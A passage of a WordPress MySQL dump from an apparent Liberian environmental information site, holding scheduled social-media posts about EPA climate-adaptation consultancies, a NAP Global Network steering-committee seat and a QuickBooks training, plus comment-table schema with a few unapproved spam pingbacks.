Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"PROJECT BACKGROUND\\n\\nThe EPA is Liberia\\u2019s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\\n\\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project \\u201cEnhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).\\u201d EPA is the project\\u2019s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\\n\\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\\n\\nComponent 1: Strengthening Institutional Capacity for Climate Change Adaptation Planning\\n\\nComponent 2: Innovation, technologies and climate information introduced for coastal adaptation planning.\\n\\nComponent 3: Introducing Engineered Hybrid Adaptation Solutions, and;\\n\\nComponent 4: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\\n\\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country\\u2019s most vulnerable coastal counties.\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/consultancy-national-climate-change-and-early-warning-expert\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 22:33:57',NULL,NULL,'2026-06-17 22:33:03','2026-06-17 22:33:57'),(23,'Liberia Secures Seat on NAP Global Network Steering Committee for 2026–2028','{\"settings\":{\"name\":\"Liberia Secures Seat on NAP Global Network Steering Committee for 2026\\u20132028\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"BONN, Germany, June 17, 2026 \\u2014 Liberia has secured a seat on the Steering Committee of the National Adaptation Plans (NAP) Global Network for the 2026\\u20132028 term, marking a significant milestone in the country\\u2019s growing engagement in international climate governance and adaptation planning.\\n\\nRepresenting Liberia on the Steering Committee will be Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia and National Adaptation Plan National Focal Point. He will serve alongside representatives from the Maldives, Mexico, the Central African Republic, Canada, Saint Lucia, Albania, Germany, the United Kingdom, and Vietnam.\\n\\nThe member countries represent a diverse mix of Least Developed Countries, Small Island Developing States, developing nations, and developed countries, reflecting the Network\\u2019s commitment to inclusive and collaborative climate adaptation efforts.\\n\\nAs a governing body of the NAP Global Network, the Steering Committee is responsible for providing strategic leadership and guidance aimed at advancing climate adaptation planning worldwide. The committee will help shape the Network\\u2019s strategic direction and priorities while supporting efforts to mobilize climate finance for adaptation interventions.\\n\\nThe committee will oversee the implementation of programs and activities under the NAP Global Network and work to strengthen collaboration among member countries and development partners. It will also promote the exchange of knowledge, technical expertise, and best practices in climate adaptation planning while supporting national efforts to build resilience against the growing impacts of climate change.\\n\\nIn addition to providing strategic oversight, Steering Committee members are expected to serve as ambassadors for the Network by communicating its goals, priorities, and activities to key stakeholders across regions and sectors.\\n\\nLiberia\\u2019s participation on the Steering Committee is expected to provide the country with a stronger platform to contribute to global climate adaptation discussions while sharing its own experiences and learning from other nations facing similar climate-related challenges.\\n\\nThe inaugural Steering Committee meeting for 2026 is scheduled to take place virtually on Friday, June 19, 2026. The meeting will bring together representatives of member countries and partner organizations to discuss strategic priorities, ongoing initiatives, and future opportunities for collaboration.\\n\\nLiberia\\u2019s appointment underscores the country\\u2019s increasing leadership in climate action and its commitment to strengthening national adaptation planning as part of broader efforts to promote sustainable development and climate resilience.\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"today-newssss.jpeg\",\"uid\":5976,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/today-newssss.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 22:55:44',NULL,NULL,'2026-06-17 22:55:43','2026-06-17 22:55:44'),(24,'Re post: CONSULTANCY: National Climate Change and Early Warning Expert','{\"settings\":{\"name\":\"Re post: CONSULTANCY: National Climate Change and Early Warning Expert\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"PROJECT BACKGROUND\\n\\nThe EPA is Liberia\\u2019s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\\n\\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project \\u201cEnhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).\\u201d EPA is the project\\u2019s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\\n\\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\\n\\nComponent 1: Strengthening Institutional Capacity for Climate Change Adaptation Planning\\n\\nComponent 2: Innovation, technologies and climate information introduced for coastal adaptation planning.\\n\\nComponent 3: Introducing Engineered Hybrid Adaptation Solutions, and;\\n\\nComponent 4: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\\n\\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country\\u2019s most vulnerable coastal counties.\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/consultancy-national-climate-change-and-early-warning-expert\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-17 22:56:17',NULL,NULL,'2026-06-17 22:56:16','2026-06-17 22:56:17'),(25,'National Climate Risk and Sea and River Defense Management Specialist ','{\"settings\":{\"name\":\"National Climate Risk and Sea and River Defense Management Specialist \",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"BACKGROUND \\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\\n\\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project \\u201cEnhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).\\u201d EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\\n\\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid \",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/national-climate-risk-and-sea-and-river-defense-management-specialist\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-18 22:10:03',NULL,NULL,'2026-06-18 22:10:02','2026-06-18 22:10:03'),(26,'Re post: National Climate Risk and Sea and River Defense Management Specialist ','{\"settings\":{\"name\":\"Re post: National Climate Risk and Sea and River Defense Management Specialist \",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"BACKGROUND \\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\\n\\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project \\u201cEnhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).\\u201d EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\\n\\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid \",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":true,\"link\":\"https:\\/\\/ekmsliberia.info\\/ekms-bulletin\\/national-climate-risk-and-sea-and-river-defense-management-specialist\\/\",\"media\":[]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-18 22:10:20',NULL,NULL,'2026-06-18 22:10:19','2026-06-18 22:10:20'),(27,'EPA Strengthens Financial Accountability Through QuickBooks Capacity-Building Initiative in Buchanan','{\"settings\":{\"name\":\"EPA Strengthens Financial Accountability Through QuickBooks Capacity-Building Initiative in Buchanan\",\"post_interval_type\":\"hour\",\"post_interval_value\":1,\"repeat\":false},\"accounts\":{\"accountIds\":[1],\"groupIds\":[]},\"templates\":{\"all\":{\"content\":\"\",\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"bluesky\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"discord\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"facebook\":{\"content\":\"Buchanan, Grand Bassa County \\u2013 June 2026 \\u2013 The Environmental Protection Agency (EPA) of Liberia has launched a four-day intensive QuickBooks Training Workshop aimed at strengthening financial accountability, transparency, and operational efficiency across the institution and its various donor-funded projects.\\n\\nThe training, currently underway in Buchanan City, Grand Bassa County, brings together finance officers, accountants, project administrators, approving officials, and key personnel from different departments and projects of the Agency.\\n\\nThe workshop is designed to equip participants with practical knowledge and skills in digital financial management, enabling them to accurately record transactions, monitor budgets, track expenditures, generate financial reports, and ensure compliance with both national financial regulations and donor requirements.\\n\\nThe initiative forms part of the EPA\\u2019s broader efforts to modernize its financial management systems and promote responsible stewardship of public and development partner resources.\\n\\nSpeaking on behalf of the Executive Director of the Environmental Protection Agency of Liberia, Deputy Executive Director for Administration, Mr. Anthony S. Kollie, described the workshop as a timely and strategic investment in the Agency\\u2019s institutional capacity.\\n\\nMr. Kollie emphasized that strong financial management systems are critical to achieving the EPA\\u2019s mandate, particularly as the Agency continues to oversee a growing portfolio of national and international environmental programs.\\n\\n\\u201cAs the EPA continues to implement climate change adaptation initiatives, biodiversity conservation projects, pollution control programs, ecosystem restoration activities, and community resilience interventions, the need for robust financial controls and efficient resource management becomes increasingly important,\\u201d he stated.\\n\\nHe noted that accountability, transparency, efficiency, and effective financial reporting are now indispensable requirements for public institutions and development projects worldwide.\\n\\nAccording to him, the adoption of modern financial management tools such as QuickBooks aligns the EPA with international best practices and strengthens the Agency\\u2019s ability to manage resources effectively.\\n\\nThe EPA Deputy Executive Director stressed that the training goes beyond learning software applications and represents a significant step toward building a stronger and more resilient financial management framework within the EPA.\\n\\n\\u201cThis training is not simply about learning a software application. It is about strengthening institutional capacity, improving financial controls, reducing errors, enhancing reporting accuracy, and supporting evidence-based decision-making,\\u201d Mr. Kollie told participants during the opening ceremony.\\nMr. Kollie encouraged participants to take full advantage of the training by actively engaging in discussions, asking questions, and sharing experiences with facilitators and colleagues.\\n\",\"edit\":false,\"isAllImages\":true,\"isLinkCard\":false,\"link\":\"\",\"media\":[{\"name\":\"today.jpeg\",\"uid\":5987,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2026\\/06\\/today.jpeg\"}]},\"googleBusinessProfile\":{\"button\":\"none\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"instagram\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":true,\"media\":[]},\"line\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"linkedin\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"pinterest\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"title\":\"\"},\"telegram\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"threads\":{\"comment\":\"\",\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[],\"topic\":\"\"},\"tiktok\":{\"allowComment\":true,\"content\":\"\",\"duet\":false,\"edit\":false,\"media\":[],\"privacyLevel\":\"PUBLIC_TO_EVERYONE\",\"stitch\":false},\"tumblr\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]},\"twitter\":{\"content\":\"\",\"edit\":false,\"isAllImages\":false,\"isLinkCard\":false,\"link\":\"\",\"media\":[]}}}',NULL,0,2,2,0,NULL,'2026-06-18 23:39:30',NULL,NULL,'2026-06-18 23:39:29','2026-06-18 23:39:30');
/*!40000 ALTER TABLE `wp_bit_social_schedules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
INSERT INTO `wp_commentmeta` VALUES (1,2,'akismet_result','false'),(5,4,'akismet_result','false'),(10,5,'akismet_result','false'),(12,6,'akismet_result','false');
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES (2,5428,'viagra 25mg cost','','https://vikmeepxez.com/','5.22.207.75','2025-05-29 16:36:21','2025-05-29 16:36:21','[&#8230;] sildenafil 100mg cost [&#8230;]',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/603.1.13 (KHTML, like Gecko) Version/10.1 Safari/603.1.13','pingback',0,0),(4,5436,'buy viagra 100mg','','https://vikmeepxez.com/','146.247.112.234','2025-05-30 05:17:39','2025-05-30 05:17:39','[&#8230;] sildenafil 50 mg cost [&#8230;]',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/603.1.13 (KHTML, like Gecko) Version/10.1 Safari/603.1.13','pingback',0,0),(5,5570,'MyBlog','','http://mnbdaa.com','185.36.81.36','2025-08-16 07:28:44','2025-08-16 07:28:44','<strong>itstitle</strong>\n\nexcerptsa',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36','trackback',0,0),(6,5821,'hello world','','https://ooolllluyyy.com','178.159.37.53','2026-03-23 04:28:37','2026-03-23 04:28:37','<strong>hello world</strong>\n\nhello world',0,'0','Mozilla/5.0 (Linux; Android 8.1.0; C5 2019 Build/OPM2.171019.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.64 Mobile Safari/537.36','trackback',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_events`
--

DROP TABLE IF EXISTS `wp_e_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_e_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `event_data` text COLLATE utf8mb4_unicode_520_ci,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `created_at_index` (`created_at`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_events`
--

LOCK TABLES `wp_e_events` WRITE;
/*!40000 ALTER TABLE `wp_e_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_submissions`
--

DROP TABLE IF EXISTS `wp_e_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_e_submissions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `hash_id` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `main_meta_id` bigint(20) unsigned NOT NULL COMMENT 'Id of main field. to represent the main meta field',
  `post_id` bigint(20) unsigned NOT NULL,
  `referer` varchar(500) COLLATE utf8mb4_unicode_ci NOT NULL,
  `referer_title` varchar(300) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `element_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `form_name` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `campaign_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip` varchar(46) COLLATE utf8mb4_unicode_ci NOT NULL,
